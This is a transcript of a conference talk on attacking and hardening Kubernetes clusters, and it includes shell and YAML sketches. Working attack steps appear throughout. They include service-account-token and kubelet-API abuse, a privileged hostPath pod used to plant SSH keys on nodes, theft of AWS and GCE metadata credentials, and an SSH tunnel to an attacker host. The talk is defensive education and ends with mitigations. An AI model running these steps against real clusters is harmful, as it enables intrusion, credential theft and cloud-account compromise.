Okay, I'm going to get started. Hello, my name is Brad Geesaman. Welcome to Hacking and Hardening Kubernetes by Example. If you want to grab the slides, the link is the first one here, and the GitHub repo that all the demos are run out of is in a separate window for me. You can also follow those two in front of you if you're far back and can't see the text, or if it goes by a little too quickly. I have to apologize for going through it so fast, but I have so much to show and I want to show it to you. So treat this as an index, so to speak: you can go back later and dive in deep at your leisure.

A little bit about me. I was a penetration tester and consultant for the last five or six years, using the cloud almost exclusively, designing ethical hacking simulations and capture-the-flag exercises. For the past year, my former company has been running capture-the-flag exercises on top of Kubernetes inside AWS. That sounds crazy, and it is a little bit, but we worked very hard to make it a success. In the past few months I've spent a lot of time looking at as many clusters as I could, researching Kubernetes security and policy, and that body of research is what I want to share with you today.

So for the past five months, I've installed a few clusters. I've dreamt that I was installing a cluster while I was asleep; it was very surreal. By show of hands, who has a cluster that's listed here, or uses an installer that's listed here, with one of those versions or similar? Okay, a fair number of you. Welcome. How many of you run your own distro? You rolled your own? Brave souls. Awesome. It'll still apply to you, I promise.

The biggest takeaway for me, from a security perspective, looking at all of these installation mechanisms, is that a malicious user with a shell, by default (I'm saying "default" on purpose), can very possibly and almost very likely exfiltrate source code, keys, tokens, and credentials; elevate their privilege inside the cluster from a non-privileged state to a privileged state, which often then leads to root access on the underlying nodes; and, bullet point number four, which is probably the most interesting and the least talked about, expand the blast radius to your entire cloud account in some situations. I hope to move quickly enough to cover that in its entirety.

The goals of this talk: raise awareness of those high-risk attacks in as many installers and distributions as possible, so that everyone has that knowledge; demonstrate the attacks live (I'm not brave enough to type live, and I don't type quickly enough, so these are recorded typing sessions, which also gives you something to take home and examine); and finally, provide hardening methods for those specific attacks, plus additional guidance that goes a few steps beyond.

So, like Morpheus, I'm beginning to believe that high system complexity means that for users who are new to a project, getting it to work from an operator's perspective is hard enough. There's such a wide range of new terminology, tools, and mechanisms that most people use the defaults the first time through: "Look, they probably know better than me, I'm just going to accept the defaults. Let's go, see how it works."
But defaults tend to have inertia: defaults in use early tend to stay in use, and systems hardened late tend to break. As I was going through all the clusters, that's what I was doing, so I was running into it left and right. My belief is that having default values be secure early on in a project, or in how you distribute your project in source code, has positive downstream effects for the community. And when something like Kubernetes literally blows up with widespread adoption, that inertia is big and it's real.

That leads us into what I call a security capability gap (I struggled with the name for this). Basically, the community at large is somewhat behind the major dot releases as they come out, so maybe you're between 1.5 and 1.7. Most mortals can't deploy a brand-new Kubernetes release overnight. Most installers and container-as-a-service offerings are keeping up, but the trick is that the security capabilities and features are coming in the newer releases. If you're still on 1.5 or 1.6, RBAC is really rough for you; by 1.7 and 1.8, it's been baked in and battle-tested. So it's tough, because you have to keep up with those fast-moving releases, and until then it's up to you to add additional security hardening. If you're on 1.6 or 1.7, don't despair; it just needs a lot of elbow grease.

The things I want to talk about today are not extremely in-depth, esoteric attacks or kernel-level exploits. I'm talking about low-hanging fruit. I believe I found enough of it to share with you, and that's enough for a start. We can raise the bar just by doing basic image safety, RBAC, and network isolation: enforcing the basic controls that already exist inside clusters.

So when you go to harden some clusters, what are some of the challenges? A lot of folks like to use DISA STIGs or CIS benchmarks to answer, "What's the security posture of my cluster?" Well, at the operating-system level, those benchmarks don't take into account the workload running on top. They check that the passwd and group files have the proper permissions, but they don't know anything about Kubernetes. Conversely, the CIS Kubernetes benchmark doesn't take the OS into consideration, nor how the installer places things: where it puts them, and where it grabs them from in the cloud provider. So properly hardening your Kubernetes cluster is highly dependent on your environment, your add-ons, and your plugins, and the defaults are very often not enough. There are a lot of knobs you have to tweak, and we're going to go through some of them.

Next, something I like to call attack-driven hardening. This is just how I think; it's been built into me as a pen tester. Every time I look at a system, I try to reason about its security posture this way, in progressive steps. I ask: from where I am, what can I see, do, or access next? I pick one of the most plausible methods and say, all right, assume that happened. Now what does it look like? What can I see, do, or access next? And I repeat until it's game over, until the worst data is taken and extracted. Then I work backwards and harden as I go.
It's basically quick-and-dirty attack modeling. So everybody here today can take on the persona of the external attacker. If you're looking at a cluster, these are typically the methods you think of right off the bat. Are you going to get SSH access to the nodes? Maybe, but not likely. Go through the API server? Maybe, but not likely. You don't have credentials for either of those. But what about getting a shell on a container inside the cluster? That's where it gets interesting. The three approaches I came up with right off the bat: exploiting an application running in an exposed container (that's hit or miss; not all apps have a remote code execution vulnerability), tricking an admin into running a compromised container (that's interesting), or compromising a project developer: compromise their GitHub keys or their Docker registry keys and modify the project's images and binaries. Throughout this research, I actually found somebody's credentials in a Git commit by accident. I was just looking at code, and there they were, and after I reported it, they confirmed it was indeed their company's ability to push to Quay. So that's a real risk. Protect your keys.

So which is easier? I'm going to pick on number two today: tricking an admin. I've written a couple of blog posts, but I've read thousands, and I found a pattern. The post says: here's something really complicated; use my custom images; hey, here's my Dockerfile, everything's on the up and up. And what's in those instructions? A kubectl create -f pointed at a URL. Just slam all these pods and services in, and then figure it out and see what happens. I like to think kubectl create from a URL is the new curl-pipe-to-bash, because it really is, and it's often worse, because now it's distributed across thousands of nodes.

I said this is about hacking and hardening, so let's make with the hacking. For the rest of the attack walkthrough, this is my 3D diagram of a sacrificial cluster. In the lower left, you have the master node; in the upper right, you have two workers. Very straightforward, very simplistic. We've got a couple of pods running; not all are represented here, just the ones we care about in this case. And we have the metadata API represented as that yellow block up there.

So, my handy-dandy little attacker icon here: if they're able to exploit the vulnerable app in the default namespace and get a shell, can they install custom tools? By doing so, they prove internet access, which is something penetration testers always want, to pull down their toolsets. Can I install curl, netcat, and the like? Can I pull down the kubectl binary, put it in place, and run it? That's always interesting.

Another thing to look at: it's not common anymore, but if you're running 1.4 or 1.5, a lot of the installers back then (or if you rolled your own, you might still have it) used the insecure bind address on the API server. That's a big no-no, because there's no authentication or authorization on that port. It's a direct path to cluster-admin. Notice that little red triangle; that means a bad day, whenever you see a red triangle. (A sketch of probing that port follows this section.)

Whenever you're doing a penetration test and you break into that first system, the first thing you ask is: what does the world look like? I have no idea where I'm going, so I'm running scanning tools, I'm throwing packets everywhere. Well, in a distributed system where everything's based on APIs, that enumeration is just a couple of curl commands now.
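As a concrete illustration of that insecure bind address mentioned a moment ago, here's a minimal sketch, assuming a compromised pod with curl installed and a master reachable at a placeholder IP; the flags named in the comments are the old API server options that open this port:

```
# Hypothetical probe from inside a compromised pod. If the API server was
# started with --insecure-bind-address=0.0.0.0 and --insecure-port=8080,
# this port answers with full cluster-admin rights and no credentials.
curl -s http://10.0.0.10:8080/version         # 10.0.0.10 is a placeholder master IP
curl -s http://10.0.0.10:8080/api/v1/secrets  # unauthenticated secret listing
```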
If I hit cAdvisor, Heapster, the kubelet, Prometheus's node exporter, or kube-state-metrics, any of those, and just say, "Tell me about yourself," the answer is everything: what the pods are named, where they're running, what their pod hashes are. Everything is right there.

That leads me to my first demo. Because we have kubectl, because we have that access, we can list the nodes and see the IP address of one of them. cAdvisor runs on port 4194. Hit the metrics endpoint, and cAdvisor will happily tell you everything about what's running on that system: pod names (which are always randomized), the namespaces they're in, the container names and versions, the SHA hashes; basically everything it's running. There's my Redis. We'll get to that guy later.

This next one I think is fairly well known, but it's incredibly important: the default service account token. It's located in this directory and auto-mounted in a lot of clusters, specifically those before RBAC. This is a really big deal. If you have RBAC enabled, we'll get to some of that. But if you can run kubectl (kube-control, sorry, I was corrected this morning in the keynote), you can get pods, get secrets, and you're cluster-admin. Again, red triangle, bad day. So: we install some tools, download the kubectl binary, and validate we can hit the API. Yes, we have the service account token mounted. We can get pods, list all the secrets, look for the good ones, and dump their contents. Four or five curl commands, and we've escalated. (A rough sketch of that sequence appears just after this section.)

Next up: the Kubernetes dashboard. Raise your hands if you run the Kubernetes dashboard. Awesome. Are you running a 1.7-or-higher version of the dashboard? Okay. All right. So as you know, there's no authentication on it; it needs protection. If you're in this vulnerable app pod here, most often you can just hit it by its service name; you don't even need to know the IP address. But that's kind of tough to use from curl; it's a big graphical dashboard. So we forward a port over SSH instead; that's really two commands away. Yes, we're inside Kubernetes; let me get the service. Yep, the dashboard's there. Let me get the IP address by pinging it (that's a cheap way to do it without having dig installed). Then we SSH out to my bad IP, my attacking system, and say: take remote port 8000 and funnel it on down into the dashboard. On that remote attacking host, you go to localhost:8000, and the dashboard is in front of you.

What about tampering with other services inside the cluster? As you can see, there's a vote app and a Redis: the azure-vote-front and azure-vote-back application. It's a very simple Python app with a Redis backend. You can vote for cats or dogs, right? Hack the vote: we're going to tamper with it. I grew up with cats, so I'm going to pick on cats today. We get the service, azure-vote-back, and get its IP. Yep, port 6379 is open. Install the Redis CLI. Can we connect to it? Yep, we can. Dump the keys. I'd like cats to be 1,000, so let's set cats to 1,000 and hit the web front page. I apologize that it's in curl, but you'll see it at the very bottom there: cats is 1,000, dogs is 6. Take that and extrapolate it to any unauthenticated service in the back end of your cluster. I picked on Redis because it's simple and straightforward to demonstrate; a sketch of the whole exchange follows below.
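First, a minimal sketch of that service-account-token escalation, assuming a pre-RBAC cluster where the default token carries cluster-admin; the API server address and the kubectl release URL are placeholders:

```
# The auto-mounted token lives at a well-known path inside the pod.
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
# Validate that the API server accepts it.
curl -sk -H "Authorization: Bearer $TOKEN" https://kubernetes.default/api
# Pull down a kubectl binary (release URL of the day) and reuse the token.
curl -sLo kubectl https://storage.googleapis.com/kubernetes-release/release/v1.8.0/bin/linux/amd64/kubectl
chmod +x kubectl
./kubectl --server=https://kubernetes.default --insecure-skip-tls-verify \
  --token="$TOKEN" get pods --all-namespaces
./kubectl --server=https://kubernetes.default --insecure-skip-tls-verify \
  --token="$TOKEN" get secrets --all-namespaces
```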
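And a hedged reconstruction of the hack-the-vote exchange; the service names come from the demo, and the apt commands assume the compromised pod is Debian-based:

```
# Resolve the backing service by name; cluster DNS does the work.
getent hosts azure-vote-back
# Install the Redis client inside the compromised pod.
apt-get update && apt-get install -y redis-tools
# The backend is unauthenticated: dump the keys and tamper with the vote.
redis-cli -h azure-vote-back KEYS '*'
redis-cli -h azure-vote-back SET cats 1000
# Verify the rigged count on the front end.
curl -s http://azure-vote-front/ | tail
```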
Here's where it gets a little more interesting: the kubelet "exploit." How many of you have heard of this attack method? Well, it's basically not an exploit; that's why it's in air quotes. The kubelet API allows this. In clusters without certain settings on the kubelet, it will allow anybody to connect to this endpoint, exec into containers, ask for logs, and do other nefarious things. So what we're going to do is ask the kubelet to run a command in a given container on it. With one curl command, we can say: hey, I want you to exec, to list this directory, inside that pod right there running on that node.

We get the node IPs right here. Port 10250 is the read-write kubelet API port; 10255 is the read-only metrics port. When we hit the runningpods method, we cat it out into a file so it's easier to look at; it's a nice JSON object. Very much like cAdvisor, it's everything the kubelet is running, complete with the hashes, the namespace, the pod name, and the container name, which is important for the next command. There's azure-vote-front; that's the one we're going to pick on. We're going to look at the web directory of the azure-vote-front app: run is the action, default is the namespace, azure-vote-front plus some numbers is the pod name, then the container name, and you just say: run this command, list the root directory. app looks like an interesting directory; main.py looks interesting. We've just extracted the source code for this super-sensitive application. (A sketch of these kubelet calls follows this section.)

Next: accessing the etcd service directly. Most clusters don't expose etcd to the workers, but some install a separate etcd instance to back Calico or network policy, and in some cases that's also exposed with no TLS, authentication, or authorization. So you may be able to defeat the system where it stores your network policies: if there are network policies, but you can hit that etcd endpoint, you can go in there and say, "Calico, forget about all your network policies," and Calico will happily remove every network policy from the nodes in your cluster. This is pretty rare, and I'll get to the frequency of this one later.

Now, any of those methods I showed for getting at the kubelet or a service account token may let you schedule a pod that mounts the host filesystem, add your own SSH key, and then SSH in. We're getting into the multi-step parts here. What we do is get the node name as it's represented inside Kubernetes, and the external IP address of that node so we can SSH into it later, then create a very simple pod specification. I pick on nginx because it's based on Debian, but we make sure privileged is true and we mount the root file path. Here's what it looks like with the nodeSelector in there, so it gets scheduled on that one specific node. We run it, we exec into it, we chroot into the mounted root filesystem, and now we're on the host as root. Add our own SSH key, back on out, and SSH directly in. If you're root and able to run Docker containers under the hood that Kubernetes doesn't know about, running backdoors and such, it's a pretty bad day. (A sketch of that pod spec follows below.)
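A minimal sketch of those kubelet calls, assuming a kubelet that still allows anonymous requests; the node IP and the pod-name suffix are placeholders:

```
# Enumerate everything the kubelet is running (read-write port, 10250).
curl -sk https://10.0.0.11:10250/runningpods/ > pods.json
# Ask the kubelet to exec inside a container:
#   /run/<namespace>/<pod-name>/<container-name> with cmd=<command>
curl -sk https://10.0.0.11:10250/run/default/azure-vote-front-12345/azure-vote-front \
  -d "cmd=ls -la /app"
curl -sk https://10.0.0.11:10250/run/default/azure-vote-front-12345/azure-vote-front \
  -d "cmd=cat /app/main.py"
```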
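And a hedged sketch of the node-takeover pod; the names are placeholders, and this assumes nothing like a PodSecurityPolicy is in place to reject it:

```
# Privileged pod that mounts the node's root filesystem, pinned to one node.
cat <<'EOF' | kubectl create -f -
apiVersion: v1
kind: Pod
metadata:
  name: priv-pod                         # hypothetical name
spec:
  nodeSelector:
    kubernetes.io/hostname: worker-1     # placeholder target node
  containers:
  - name: shell
    image: nginx                         # Debian-based, so bash is available
    securityContext:
      privileged: true
    volumeMounts:
    - name: hostroot
      mountPath: /rootfs                 # the node's entire filesystem
  volumes:
  - name: hostroot
    hostPath:
      path: /
EOF
# Exec in, chroot to the host, and plant an SSH key:
kubectl exec -it priv-pod -- chroot /rootfs /bin/bash
# (now root on the node) cat attacker.pub >> /root/.ssh/authorized_keys
```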
The last classification of attacks I want to talk about is accessing the metadata API. Who's heard of 169.254.169.254? Okay, we know what that is. One of the things it does is give an instance data about itself: what region it's in, its bootstrapping information. In some of these installer cases, that often includes sensitive S3 paths or kubeadm join tokens. Right then and there, that's a bad day. But also, most of these cluster installations attach IAM instance roles with permissions to the workers and the masters, and also available via that metadata API are those AWS keys. They rotate every few hours, but they're just a curl command away. So let's curl those and get them.

From that vulnerable pod we talked about, we run one command and get keys that are valid for a couple of hours. We export those into the local shell on our attacking system, and then we have whatever permissions are attached to those keys. So: describe-instances. List me all the instances in your entire account; not just your cluster, everything in that AWS account. And describe the instance attribute called user data on every single instance in your entire cloud account. How many of you have sensitive things in the user data of instances that are not Kubernetes, maybe, possibly? That's why this blast radius is pretty bad: you might not compromise your Kubernetes cluster any further, but that web server over there, bootstrapped with a GitHub key or something delivered via user data, you can reach over and grab that. That's a bad day for the other administrators. (A sketch of the credential grab follows this section.)

When I talk about IAM permissions, the masters and the workers typically have something that looks like this: Describe* for the worker; the masters have ec2:*, the ECR ability to pull images from AWS ECR, and some S3 capabilities. But we really want that ec2:*, don't we? That means any AWS EC2 command is available to us. So how do we get it? We need to make sure the curl originates from the master. There are a couple of ways of doing that: compromising an existing pod running on the master, which is kind of tough, or using one of those two issues we just talked about. If you find a service account token, just ask the API server; or just ask the kubelet running on the master to run a command for you inside a pod. It looks like this: basically wrapping a curl command this way or that way. Notice how close they are; basically the same thing, just asking somebody different to do it.

And the final example of why this is a bad day: if you have ec2:*, you can create a new VPC, a new security group, a new SSH key, and a new instance; snapshot every volume from every single instance in your entire cloud account; and then mount them on that instance. That can be automated, as you can imagine, within five or ten minutes. A pretty bad day. And if you're on the master, you might then also be able, in some cases, by installation default, to list everything in AWS S3. Who stores logs and sends backups to S3? It's a bad day.
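A minimal sketch of that credential grab, assuming an AWS-hosted cluster with no metadata proxy in the way; the role name comes back from the first call:

```
# From inside any pod with egress to the metadata API: find the role name...
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
# ...then fetch the temporary keys attached to the node's instance profile.
curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/${ROLE}"
# On the attacker's own machine, export the returned values and enumerate:
#   export AWS_ACCESS_KEY_ID=... AWS_SECRET_ACCESS_KEY=... AWS_SESSION_TOKEN=...
#   aws ec2 describe-instances
#   aws ec2 describe-instance-attribute --attribute userData --instance-id i-xxxx
```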
So, attacks 9 and 10: I'm switching gears and talking about GKE and GCE now. On GKE specifically, there's an instance attribute, much like the user-data endpoint on the AWS API, called kube-env, and that's what the kubelet uses to bootstrap itself; it gets its keys from it. That's often reachable directly. Just clicked; there we go. So here's that listing. As part of Google's security features, though, you have to pass a header into Google's metadata API, to prove the request is deliberate and not coming through a server-side request forgery. But configure.sh looks interesting, kube-env looks interesting, user-data looks interesting. So we can go poke at those. This one references the kube-env, and right there you can see a lot of good stuff. We know what the release is. We know where it's getting things from. We know the IPs of the master. And we can see the kubelet's information on where it gets its key, cert, and CA. (A sketch of the metadata calls involved follows this section.)

This wall of text is what I call the one-shot. If you get a shell on a container inside GKE, you can become the kubelet with this one awesome bash hunk of junk: pull down a kubectl, grab the kube-env from the metadata API, strip out the parts, base64-decode them into the kubelet's authentication credentials, and then run kubectl to list all the pods in all the namespaces. One thing of note: you probably want to get the secrets, right? Well, the kubelet doesn't have the ability to list all the secrets, but it can pull a secret if it knows its name. The best way to get a name is to output get pods in YAML for a pod you know of specifically. I used the dashboard here because I know it's got the cluster-admin token. You say: dump the pod spec in YAML, and it tells you the mounted secret by name. Now you know what it is, and you can go get that secret directly. In this case, it's the default service account token in the kube-system namespace. What we do with that is the same as before; I'm going to skip it for the sake of speed: mount the host filesystem, add an SSH key, and SSH in.

The second method through the GKE and GCE metadata API: just like EC2 assigns permissions to instances, GKE does the same thing. They give you an IAM token and instance scopes, and that IAM token lets you talk to the Google Compute API and run actions on things inside the scope of that project. One of the things you can do is enumerate all the instances, of course, but you can also use this really handy-dandy API method that adds an SSH key. If you have these privileges and this token, you can be on worker one, call for the token, hit the API and say: hey, add my SSH key to worker two. Google will happily do that if you're authenticated. Then you can SSH into worker two, or anything inside the scope of that project. If you're running multiple clusters, that means any node of any cluster in that same project.

So: we get the external IP, so we know what to SSH into when we're done. We list the instances in the project and page through it a little, just so you can see how much information is there. A lot of good stuff: the addresses, the external NATs, the user data, the kube-env, for all the instances in the project. It's the equivalent of an AWS EC2 describe-instances, inside Google. Then I do the same thing but describe a single instance, to see everything about that one node and get its fingerprint, which is needed to properly form this API call. And forgive me, I use curl and bash to keep it simple, but you don't need to download extra tools; there's no malware running here, it's all curl and bash and such. So we make a POST body with the fingerprint we just pulled, add my SSH key (as you can see, the public key), and POST it to that API.
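For reference, a sketch of the two GCE metadata calls involved; the Metadata-Flavor header is the anti-SSRF check mentioned above:

```
# The kube-env attribute that bootstraps the kubelet (keys, certs, master IPs).
curl -s -H 'Metadata-Flavor: Google' \
  'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env'
# The node's OAuth token for the Compute API, scoped to the project.
curl -s -H 'Metadata-Flavor: Google' \
  'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
```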
Let me show you what it looks like rendered: that's what the final POST body looks like. Here, Google, go add me to worker 2. It happily does it, and we're root on that second node. Again, a bad day.

Okay. So, how prevalent are these issues? This is what compelled me to do this talk. And I want to stress something: this is not the entire security posture of each of these clusters. This is a narrow band, just the items I've identified here; it says nothing about the rest. And these are the specific versions I tested; note those versions. I started testing in August and September; we'll get to what the latest releases look like. So it's prevalent, right? You'd admit it's not uncommon. But don't despair. We can do it; we have the technology.

Attacks 7 through 10: if you're running in AWS, I recommend what's called a metadata proxy, something that makes sure that when you go to 169.254.169.254, you're allowed to as a pod. kube2iam and kiam both worked in my testing to make sure you're taken care of in AWS. For Google, there's the GCE metadata proxy and "these steps"; and I apologize, the words "these steps" are actually masking Google's GKE hardening blog post, which was released very recently. That's an incredibly important link (a late addition, sorry) and really useful for blocking the attacks I just showed. And if you're running network policy on 1.8, egress blocking is also a valid method. If you're on older versions of Kubernetes like I was, and you're using Calico, you can use calicoctl under the hood to get the same effect; it's not through the Kubernetes API, but you can do it.

Protect the kubelet: authorization mode Webhook. If you don't see that setting, your kubelet is probably allowing that kubelet "exploit" bit.

Isolate your workloads. Remember hack-the-vote? A very simple network policy literally stops it in its tracks: you say that every pod with the label azure-vote-back only gets ingress from azure-vote-front. (A sketch of that policy follows this section.)

This next one is an almost 99%-perfect drop-in if you're running the dashboard and have network policy ingress support; drop it in and it will protect your dashboard. It's a bit of a trick: we have a pod selector that matches the Kubernetes dashboard only, but there are no rules, so by default that means a default deny. This does not block kubectl proxy, which works through the API server; it blocks access from pods, which have no business talking to the dashboard.

Restrict the default service account token, and use RBAC along with the Node authorizer and NodeRestriction admission plugin. And I want to stress something: you have to exec into the pods and verify this. It's very easy to miss or do incorrectly when you're messing with RBAC. And monitor all RBAC audit failures: either you have a misconfiguration in your app, or somebody's attacking you and failing.

And I'm happy to say that with 1.8 and above supporting egress natively, this policy works in your clusters as a really nice default-deny platform. Apply it to every single one of your namespaces. It says: ingress and egress, nothing is allowed, except kube-dns lookups to start. Put it down as a cluster administrator, and then deploy the network policy for your workloads with the workload lifecycle: when you're deploying azure-vote-front and back, apply the network policy that allows those two to work together at that time. (A sketch of such a default deny follows below.)
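A sketch of that isolation policy, assuming the pods carry app: azure-vote-back and app: azure-vote-front labels (the exact label keys in the demo may differ):

```
# Only azure-vote-front pods may reach the Redis backend; the redis-cli
# session from the attack demo no longer connects at all.
cat <<'EOF' | kubectl apply -f -
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: azure-vote-back-ingress
  namespace: default
spec:
  podSelector:
    matchLabels:
      app: azure-vote-back
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: azure-vote-front
EOF
```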
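And a minimal sketch of that namespace-wide default deny for 1.8+ clusters with native egress support; the DNS exception here is the loosest form (UDP 53 to anywhere), so treat it as a starting point to tighten toward kube-dns only:

```
# Nothing in, nothing out, except DNS lookups; apply one per namespace,
# then layer workload-specific allow policies on top at deploy time.
cat <<'EOF' | kubectl apply -f -
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: default
spec:
  podSelector: {}              # selects every pod in the namespace
  policyTypes:
  - Ingress
  - Egress
  egress:
  - ports:
    - protocol: UDP
      port: 53
EOF
```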
And I'm happy to say that throughout these last five months, I've worked with every single one of these projects, directly disclosing the issues I found. In a lot of cases, fixes were already in progress, already in flight. But with newer releases, Kubernetes 1.8, and a little bit of elbow grease, we can look like this: we can literally wipe out this classification of vulnerabilities for good and make the infrastructure nice and boring.

Two tools I want to tell you about. kubeatf is a tool I wrote to help automate the creation, validation, and destruction of all these clusters in a sane way, because I spun them up every day for two hours and threw them away, over and over, through all of them. And Heptio Sonobuoy: I wrote a plugin for it, basically a proof of concept, and there's so much more you can do with this. It currently runs a CIS benchmark using Aqua Security's kube-bench. By deploying that plugin into Sonobuoy, we can continually scan our nodes for posture assessment in a very sane way.

So, even more security hardening tips. This is where it goes above that line on the apple tree I showed you; this is where it gets a little more advanced. Let's assume you've done all the things I just suggested; here's what to look at next. Verify that all your settings are properly enforced. I can't tell you how many times I thought I'd hardened something, went to validate it, and found I hadn't done it quite correctly; I didn't get that label just right. It's important that you validate. There are more features in every dot release. Audit at every level you can: the OS, the runtime, and Kubernetes; I like the CIS benchmarks. Log everything outside the cluster; that's important. And practice safe image security; there are all sorts of good talks, blog posts, and tools that help with that.

I already covered the Kubernetes components a bit, but the network security policy bit is incredibly important now that we have ingress and egress; use that to your advantage. You can mask a lot of attacks just by not having network access. Protect your workloads by default by saying no ingress and no egress, and then apply what is allowed. It's whitelisting, not blacklisting. And I added this the other day: consider a service mesh. There are a lot of benefits beyond all the things it does for your application, the visibility, the mutual TLS; it also makes your workloads more isolated when they talk to each other, just by default, by how it works.

I think some folks have talked about this before, but namespace-per-tenant separation is really good when you combine it with that default-deny policy set. If you have a microservice here, a microservice here, and a microservice here, and they're all default deny, then by default the microservices can't talk to each other until you allow it. You can be explicit. And this is something we learned from the capture-the-flag exercises: make sure CPU and RAM limits are set (I know disk and network limits are somewhere down the line) to prevent malicious actors from filling the disk or consuming all the RAM with their tools.

Something people don't talk about, which I think is kind of interesting: in your pod specs, if you're running a pod that has no business talking to the API server, don't mount the service account token. You don't need it; don't put it there, even if it has no permissions. Defense in depth. (A sketch of both of those settings in one pod spec follows this section.)
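A minimal sketch of those last two tips in a single pod spec; the names and limit values are arbitrary examples:

```
cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: frontend                        # hypothetical workload
spec:
  automountServiceAccountToken: false   # no API server token in the pod at all
  containers:
  - name: app
    image: nginx
    resources:
      limits:
        cpu: 500m                       # cap CPU so hostile tools can't starve the node
        memory: 256Mi                   # cap RAM for the same reason
EOF
```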
And use a pod security policy to enforce container restrictions and protect the node; that's something that's going to mature over the next few releases. And a shout-out to some of the vendors I talked to; this is kind of an important note: container-aware malicious activity and behavioral detection capabilities are incredibly important for stopping the initial attack right where it starts, at the syscall level. A shell cannot happen; a curl cannot be downloaded or exec'd, et cetera. You stop it right in its tracks.

Number three in the miscellaneous security bits: separate cloud accounts, projects, or resource groups for different workloads or different clusters. I think a one-to-one mapping is safest for now; there are just too many ways to hop across. And don't run dev and test workloads in the same clusters, or in the same place, as production, again because of so much opportunity for crossover. And depending on your regulatory requirements, use separate node pools for separate workloads, using annotations to make sure the sensitive stuff happens here and the non-sensitive stuff happens over there.

Here are some of the tools I came across that I found notable, which you might want to take advantage of when you're auditing. The CIS benchmark has been updated for 1.8; that's a great resource, and kube-bench implements it nicely; very straightforward to run. For OS and runtime hardening, the stuff from DevSec, and ansible-hardening from Major Hayden and the other folks from OpenStack, are really good at making sure the underlying posture of your systems is solid. Then kubeaudit, which I'm looking forward to (I think that's the next talk), and Sonobuoy. I think there's a lot of room for growth in this space.

Notable security features in 1.8: network policy and pod security policy whitelisting. The egress support is huge, and volume mount whitelisting prevents a lot of those node access bits I was just showing you.

So, in closing: as a community, we're all responsible for the safety and security of the applications that power our world. Let's make that foundation secure by default, and incredibly boring. Thank you.

Okay, first I want to say thanks to all those folks I listed there on the slide. Yes, some of those installers implement kubeadm under the hood; it's the join token you've got to protect, and then there's a lot of good stuff that happens, yes: certificate rotation and expiration. Yes, sir. The question is: what's the number one thing? All of the above, but the first thing is enabling RBAC. A huge classification of these issues doesn't happen in a properly configured, RBAC-enabled cluster. The rest you still have to do, because notice how all the things I was doing required no special tools; it was just access you already have. So combining RBAC with network policy shuts off everything to start. You might have a vulnerable kubelet, the kubelet "exploit", but if you have an egress policy, you can stop that network access, assuming you've applied it to your namespace. So you can mitigate and work around, without having to fix the underlying things, with some clever policies.

I knew that question would come up: did I look at OpenShift? The answer is yes. I wanted to focus on vanilla Kubernetes because, as you know, OpenShift is a fairly opinionated distribution of Kubernetes. The only thing I talked about that applies to OpenShift by default is the metadata API.
However, they don't put anything sensitive in user data; but there are IAM credentials associated with those workers by default, and you would be able to get those. If you go after that, it's available, and they'll need the metadata proxies too, but that's the only one. I hesitated to lump OpenShift in there, because it's such a different beast compared to how all these others lined up; it's a little bit of an unfair comparison. But I would highly recommend you look at OpenShift, at least as a reference point for their security model; I have no horse in that race. I'll be in the hallway if you have any questions. Thanks so much.